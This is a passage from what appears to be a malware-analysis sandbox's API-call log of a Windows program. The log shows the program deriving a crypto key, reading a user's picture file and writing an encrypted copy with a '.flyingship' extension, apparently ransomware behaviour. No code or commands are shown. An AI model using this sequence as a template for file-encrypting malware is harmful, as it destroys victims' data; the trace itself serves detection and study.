wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.466] CryptHashData (hHash=0x90ae18, pbData=0x8dec18, dwDataLen=0x19, dwFlags=0x1) returned 1 [0191.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.466] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.466] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.466] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.466] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.467] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0191.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.483] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.483] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.483] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0191.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.483] CryptDestroyHash (hHash=0x90ae18) returned 1 [0191.483] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.483] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.483] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.483] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.483] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.484] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ov_bhlk.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.485] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.485] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0191.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0191.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0191.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0191.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0191.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.485] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0191.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0191.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0191.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0191.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0191.486] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0191.486] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0191.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0191.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0191.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0191.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0191.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0191.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0191.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0191.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0191.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0191.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0191.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0191.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0191.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0191.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0191.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0191.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0191.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0191.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0191.488] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0191.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0191.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0191.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0191.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0191.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0191.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0191.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0191.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0191.489] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.flyingship.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ov_bhlk.flyingship.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0191.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0191.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0191.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0191.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0191.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0191.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.491] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0191.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0191.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0191.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0191.491] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0191.491] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0191.491] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0191.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0191.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0191.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0191.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0191.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0191.492] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0191.492] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0191.496] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x270a, lpOverlapped=0x0) returned 1 [0191.496] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0191.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0191.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0191.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0191.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1270a) returned 0xbea018 [0191.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0191.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0191.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0191.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1270a) returned 0xbfc730 [0191.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0191.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.499] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0191.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0191.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0191.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1270a) returned 0xbea018 [0191.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0191.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0191.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.500] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0191.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0191.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0191.500] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0191.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0191.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.500] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0191.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0191.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27a8 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1270a) returned 0xbea018 [0191.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0191.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0191.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0191.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1270a) returned 0xa5f008 [0191.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0191.503] RtlAllocateHeap 